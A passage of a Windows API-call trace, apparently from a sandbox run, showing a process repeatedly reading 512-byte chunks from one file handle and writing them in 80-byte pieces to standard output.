lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] GetFileType (hFile=0x4c) returned 0x1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] GetFileType (hFile=0x4c) returned 0x1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] GetFileType (hFile=0x4c) returned 0x1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] GetFileType (hFile=0x4c) returned 0x1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] GetFileType (hFile=0x4c) returned 0x1 [0236.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.142] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2eddac, 
lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.143] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.143] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.143] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.143] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] GetFileType (hFile=0x4c) returned 0x1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] GetFileType (hFile=0x4c) returned 0x1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] GetFileType (hFile=0x4c) returned 0x1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] GetFileType (hFile=0x4c) returned 0x1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] GetFileType (hFile=0x4c) returned 0x1 [0236.143] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] GetFileType (hFile=0x4c) returned 0x1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] GetFileType (hFile=0x4c) returned 0x1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] GetFileType (hFile=0x4c) returned 0x1 [0236.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.143] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.144] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.144] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0236.144] GetFileType (hFile=0x4c) returned 0x1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] GetFileType (hFile=0x4c) returned 0x1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] GetFileType (hFile=0x4c) returned 0x1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] GetFileType (hFile=0x4c) returned 0x1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] GetFileType (hFile=0x4c) returned 0x1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] GetFileType (hFile=0x4c) returned 0x1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) 
returned 1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] GetFileType (hFile=0x4c) returned 0x1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.144] GetFileType (hFile=0x4c) returned 0x1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.145] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.145] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] GetFileType (hFile=0x4c) returned 0x1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] GetFileType (hFile=0x4c) returned 0x1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] GetFileType (hFile=0x4c) returned 0x1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] GetFileType (hFile=0x4c) returned 0x1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] GetFileType (hFile=0x4c) returned 0x1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] GetFileType (hFile=0x4c) returned 0x1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] GetFileType (hFile=0x4c) returned 0x1 [0236.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.145] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] GetFileType (hFile=0x4c) returned 0x1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.146] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.146] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] GetFileType (hFile=0x4c) returned 0x1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] GetFileType (hFile=0x4c) returned 0x1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] GetFileType (hFile=0x4c) returned 0x1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] GetFileType (hFile=0x4c) returned 0x1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] GetFileType 
(hFile=0x4c) returned 0x1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] GetFileType (hFile=0x4c) returned 0x1 [0236.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.146] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] GetFileType (hFile=0x4c) returned 0x1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] GetFileType (hFile=0x4c) returned 0x1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.147] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.147] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.147] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] GetFileType (hFile=0x4c) returned 0x1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] GetFileType (hFile=0x4c) returned 0x1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] GetFileType (hFile=0x4c) returned 0x1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] GetFileType (hFile=0x4c) returned 0x1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.147] GetFileType (hFile=0x4c) returned 0x1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] GetFileType (hFile=0x4c) returned 0x1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, 
lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] GetFileType (hFile=0x4c) returned 0x1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] GetFileType (hFile=0x4c) returned 0x1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.148] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] GetFileType (hFile=0x4c) returned 0x1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] GetFileType (hFile=0x4c) returned 0x1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] GetFileType (hFile=0x4c) returned 0x1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0236.148] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] GetFileType (hFile=0x4c) returned 0x1 [0236.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.148] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] GetFileType (hFile=0x4c) returned 0x1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] WriteFile (in: hFile=0x4c, lpBuffer=0x2eecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eecb8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] GetFileType (hFile=0x4c) returned 0x1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed08*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] GetFileType (hFile=0x4c) returned 0x1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eed58*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] GetFileType (hFile=0x4c) returned 0x1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] WriteFile (in: hFile=0x4c, 
lpBuffer=0x2eeda8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eeda8*, lpNumberOfBytesWritten=0x2eddac*=0x20, lpOverlapped=0x0) returned 1 [0236.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.149] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edd98 | out: lpNewFilePointer=0x0) returned 1 [0236.149] _get_osfhandle (_FileHandle=4) returned 0x54 [0236.149] ReadFile (in: hFile=0x54, lpBuffer=0x2eebc8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2eddb8, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesRead=0x2eddb8*=0x200, lpOverlapped=0x0) returned 1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] GetFileType (hFile=0x4c) returned 0x1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] GetFileType (hFile=0x4c) returned 0x1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] WriteFile (in: hFile=0x4c, lpBuffer=0x2eebc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eebc8*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] GetFileType (hFile=0x4c) returned 0x1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec18*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] GetFileType (hFile=0x4c) returned 0x1 [0236.149] _get_osfhandle (_FileHandle=1) returned 0x4c [0236.149] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2eddac, lpOverlapped=0x0 | out: lpBuffer=0x2eec68*, lpNumberOfBytesWritten=0x2eddac*=0x50, lpOverlapped=0x0) returned 1 [0236.150] _get_osfhandle 
